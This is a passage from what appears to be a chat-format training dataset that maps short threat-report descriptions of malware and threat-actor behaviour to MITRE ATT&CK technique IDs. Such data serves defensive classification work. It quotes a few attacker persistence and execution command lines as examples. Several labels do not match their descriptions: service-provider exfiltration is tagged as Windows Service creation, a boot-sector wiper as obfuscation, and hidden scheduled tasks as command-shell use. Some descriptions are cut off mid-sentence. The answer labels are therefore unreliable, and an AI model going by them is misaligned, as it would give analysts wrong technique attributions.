TerraTV. It runs a legitimate TeamViewer application but hides its user interface elements, so that the operators of the malware can connect to the compromised computer undetected" }, { "role": "assistant", "content": "T1219 - Remote Access Software" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gamaredon Group has used \"hidcon\" to run batch files in a hidden console window." }, { "role": "assistant", "content": "T1564.003 - Hide Artifacts: Hidden Window" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mosquito establishes persistence under the Registry key \"HKCU\\Software\\Run auto_update\"." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TRINITY malware used by identifies payment card track data on the victim and then copies it to a local file in a subdirectory of C:\\Windows\\. Once the malware collects the data, actors compressed data and moved it to another staging system before exfiltration." }, { "role": "assistant", "content": "T1074 - Data Staged" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BITTER has registered domains to stage payloads." }, { "role": "assistant", "content": "T1608.001 - Upload Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Download a file from a remote server - Create a text file on the local machine - Execute a file - Execute a shell (cmd.exe) command and save the results to disk - Upload the results of a previously executed shell command to a remote server" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Orz can download files onto the victim." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kevin can assign hard-coded fallback domains for C2." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "These appeared to be hosted on either Linode or Google Cloud, with a preference for using the ASN AS63949" }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In addition, web traffic between a service provider’s customer and a service provider is likely to be viewed as benign by network defenders at the customer, allowing the attacker to exfiltrate data stealthily" }, { "role": "assistant", "content": "T1543 - Create or Modify System Process', 'T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "queries the Registry to determine the correct Startup path to use for persistence." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can be configured to use multiple network protocols to avoid network-based detection." }, { "role": "assistant", "content": "T1026 - Multiband Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Torisma uses this method to send data back to the C2 server read from the named pipe. This is the results of the execution of the shellcode on the victim’s system through the ViewPrevPage action and the results of this execution are sent and processed using this function" }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ChChes copies itself to an .exe file with a filename that is likely intended to imitate Norton Antivirus but has several letters reversed (e.g. notron.exe)." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT41 has transferred implant files using Windows Admin Shares." }, { "role": "assistant", "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lokibot has the ability to capture input on the compromised host via keylogging." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We were able to source a sample that may be the malware involved in the May 2018 attacks. We ran it, and it broke the boot sector as expected (see Figure 1). An initial analysis of the file revealed it was created using Nullsoft Scriptable Install System (NSIS), an open-source application used to create setup programs. The actor behind this threat used the application and purposely named it “MBR Killer. There are no indications of network-related behavior in this malware" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Adds registry run keys to achieve persistence. In some cases, we observed using the following command:start cmd.exe /k runonce.exe /AlternateShellStartup" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During one investigation, APT32 was observed using a privilege escalation exploit (CVE-2016-7255) masquerading as a Windows hotfix. In another investigation, APT32 compromised the McAfee ePO infrastructure to distribute their malware as a software deployment task in which all systems pulled the payload from the ePO server using the proprietary SPIPE protocol. APT32 also used hidden or non-printing characters to help visually camouflage their malware on a system. For example, APT32 installed one backdoor as a persistent service with a legitimate service name that had a Unicode no-break space character appended to it. Another backdoor used an otherwise legitimate DLL filename padded with a non-printing OS command control code" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information', 'T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DCSrv has created new services for persistence by modifying the Registry." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "REvil has the capability to stop services and kill processes." }, { "role": "assistant", "content": "T1489 - Service Stop" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Spalax, the threat actors relied on a victim to open a PDF document and click on an embedded malicious link to download malware." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The White Company has checked for specific antivirus products on the target’s computer, including Kaspersky, Quick Heal, AVG, BitDefender, Avira, Sophos, Avast!, and ESET." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has staged encrypted archives for exfiltration on Internet-facing servers that had previously been compromised with ." }, { "role": "assistant", "content": "T1074 - Data Staged" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chinese state-sponsored cyber actors have been observed importing tools from GitHub or infected domains to victim networks. In some instances. Chinese statesponsored cyber actors used the Server Message Block (SMB) protocol to import tools into victim networks." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ke3chang has deobfuscated Base64-encoded shellcode strings prior to loading them." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "StrifeWater can collect the OS version, architecture, and machine name to create a unique token for the infected host." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "1) Use of zip file that contains a “.lnk” (Windows Shortcut) file. 2) Utilization of double extension trick (sample.doc.lnk) to convince users to open the file. 3) HTA (HTML Application) with VBScript embedded in the “.lnk” file 4) VBScript drops payloads and opens a decoy document or PDF to the user" }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NOKKI can gather information on the victim IP address." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "InvisiMole can be launched by using DLL search order hijacking in which the wrapper DLL is placed in the same folder as explorer.exe and loaded during startup into the Windows Explorer process instead of the legitimate library." }, { "role": "assistant", "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OopsIE uses the SmartAssembly obfuscator to pack an embedded .Net Framework assembly used for C2." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT19 used Regsvr32 to bypass application control techniques." }, { "role": "assistant", "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If the victim is using PowerShell 3.0 or later, POWERSOURCE writes its decoded payload to an Alternate Data Stream (ADS) named kernel32.dll that is saved in \"%PROGRAMDATA%\\Windows\\\"." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike can deobfuscate shellcode using a rolling XOR and decrypt metadata from Beacon sessions." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The maldocs used in this campaign typically contain a malicious VBA macro that downloads and activates the next stage of the infection chain. Although the VBA macro contains an auto open subroutine, it uses several VBA functions registered to trigger if the \"Typing replaces selection\" property is enabled in Microsoft Word. Appdata%\\desktop.iniThe next stage of the VBS is run using wscript.exe using a command such as:%windir%\\System32\\wscript.exe //e:vbscript //b <path_to_Stage_2>Macros dropping VBS to disk and running via wscript.exe" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When the persistence operation finishes, the loader deletes itself by writing a batch file in the Windows temporary folder with the file name prefix ‘tmp’ followed by random digits. The batch file content" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 has used pass the hash for lateral movement." }, { "role": "assistant", "content": "T1550.002 - Use Alternate Authentication Material: Pass the Hash" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "H1N1 kills and disables services by using cmd.exe." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If running as administrator, installs itself as a new service named bmwappushservice to establish persistence." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The wormDll32 module attempts to identify servers and domain controllers in the network using NetServerEnum and LDAP queries." }, { "role": "assistant", "content": "T1482 - Domain Trust Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WarzoneRAT has been install via template injection through a malicious DLL embedded within a template RTF in a Word document." }, { "role": "assistant", "content": "T1221 - Template Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pupy can drop a mouse-logger that will take small screenshots around at each click and then send back to the server." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "2) The additional commands and execution objects are executed in the machine that has been compromised in the isolated network" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AppleSeed has the ability to use multiple dynamically resolved API calls." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In green, functions from Keychaindump C&C communication Keydnap is using the onion.to Tor2Web proxy over HTTPS to report back to its C&C server" }, { "role": "assistant", "content": "T1090 - Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Using spear-phishing emails that contained malicious Amazon-themed documents, the group targeted an employee of an aerospace company in the Netherlands and a political journalist in Belgium." }, { "role": "assistant", "content": "T1566.003 - Spearphishing via Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GOLD SOUTHFIELD has used publicly-accessible RDP and remote management and monitoring (RMM) servers to gain access to victim machines." }, { "role": "assistant", "content": "T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In multiple instances, the threat actors created new accounts on the staging targets to perform cleanup operations. The accounts created were used to clear the following Windows event logs: System, Security, Terminal Services, Remote Services, and Audit. The threat actors also removed applications they installed while they were in the network along with any logs produced. For example, the Fortinet client installed at one commercial facility was deleted along with the logs that were produced from its use. Finally, data generated by other accounts used on the systems accessed were deleted" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion', 'T1070.001 - Indicator Removal on Host: Clear Windows Event Logs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Denis has used DNS tunneling for C2 communications." }, { "role": "assistant", "content": "T1071.004 - Application Layer Protocol: DNS" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HAFNIUM has used open-source C2 frameworks, including Covenant." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Prikormka creates a directory, \"%USERPROFILE%\\AppData\\Local\\SKC\\\", which is used to store collected log files." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "menuPass has leveraged vulnerabilities in Pulse Secure VPNs to hijack sessions." }, { "role": "assistant", "content": "T1190 - Exploit Public-Facing Application" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 5: Registry Activity The script then determines the version of Powershell that is being used on the infected system. This is essentially the WMI equivalent of a registry-based run key from a persistence perspective. The Stage 3 malware is by default set to run 'onidle' after 30 minutes" }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sharpshooter has sent malicious attachments via emails to targets." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LAPSUS$ has gathered detailed knowledge of team structures within a target organization." }, { "role": "assistant", "content": "T1591.004 - Identify Roles" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TrickBot can disable Windows Defender." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can download additional files." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FoggyWeb's loader has used DLL Search Order Hijacking to load malicious code instead of the legitimate `version.dll` during the `Microsoft.IdentityServer.ServiceHost.exe` execution process." }, { "role": "assistant", "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Imminent Monitor has a CommandPromptPacket and ScriptPacket module(s) for creating a remote shell and executing scripts." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bundlore has used the \"ps\" command to list processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Operation Wocao has created services on remote systems for execution purposes." }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AppleSeed has exfiltrated files using web services." }, { "role": "assistant", "content": "T1567 - Exfiltration Over Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "While performing the analysis on the delivery documents using the .sct file AppLocker bypass, we noticed the C# payload was functionally similar to the original RogueRobin payload" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ThiefQuest invokes \"time\" call to check the system's time, executes a \"sleep\" command, invokes a second \"time\" call, and then compares the time difference between the two \"time\" calls and the amount of time the system slept to identify the sandbox." }, { "role": "assistant", "content": "T1497.003 - Time Based Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "gh0st RAT has added a Registry Run key to establish persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POWRUNER may collect user account information by running \"net user /domain\" or a series of other commands on a victim." }, { "role": "assistant", "content": "T1087.002 - Account Discovery: Domain Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Empire can use modules like \"Invoke-SessionGopher\" to extract private key and session information." }, { "role": "assistant", "content": "T1552.004 - Unsecured Credentials: Private Keys" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN5 has has used the tool GET2 Penetrator to look for remote login and hard-coded credentials." }, { "role": "assistant", "content": "T1110 - Brute Force" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Threat Group-3390 actors obtain legitimate credentials using a variety of methods and use them to further lateral movement on victim networks." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "njRAT enumerates the victim operating system and computer name during the initial infection." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It is unknown what these domains may have been used for but based on the similarity of domain spoofing and sharing an IP, they are likely part of the adversary infrastructure" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Grants system privileges via Windows services - Uses DLL sideloading technique to evade security solutions - Starts and injects code to a new svchost process to prevent tracking" }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service', 'T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Inception has used PowerShell to execute malicious commands and payloads." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A second method consists to use the CredEnumerateW Windows API. Finally, Perfc.dat contains three embedded executables in its resource section which are compressed with zlib. Two of the executables are used to recover user credentials (32 and 64 bits) while the third one is the PsExec binary" }, { "role": "assistant", "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Tarrask may abuse the Windows schtasks command-line tool to create \"hidden\" scheduled tasks." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "IceApple can encrypt and compress files using Gzip prior to exfiltration." }, { "role": "assistant", "content": "T1560.001 - Archive Collected Data: Archive via Utility" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The first module downloaded by the GRIFFON malware to the victim’s computer is an information-gathering JScript, which allows the cybercriminals to understand the context of the infected workstation. This module mainly relies on WMI and Windows objects to deliver results, which will be sent back to the operators" }, { "role": "assistant", "content": "T1124 - System Time Discovery', 'T1082 - System Information Discovery', 'T1069.002 - Permission Groups Discovery: Domain Groups" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT41 collected MAC addresses from victim machines." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SMOKEDHAM has used Google Drive and Dropbox to host files downloaded by victims via malicious links." }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Andariel has used watering hole attacks, often with zero-day exploits, to gain initial access to victims within a specific IP range." }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The downloader collects basic system information and sends it via an HTTP POST request to a hardcoded command and control (C&C) server (Figure 10" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses rundll32.exe to execute as part of the Registry Run key it adds: HKEY_CURRENT_USER \\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\”vert” = “rundll32.exe c:\\windows\\temp\\pvcu.dll , Qszdez”." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Conti can delete Windows Volume Shadow Copies using \"vssadmin\"." }, { "role": "assistant", "content": "T1490 - Inhibit System Recovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of uploading and downloading files." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BlackMatter uses NtQuerySystemInformation to enumerate running 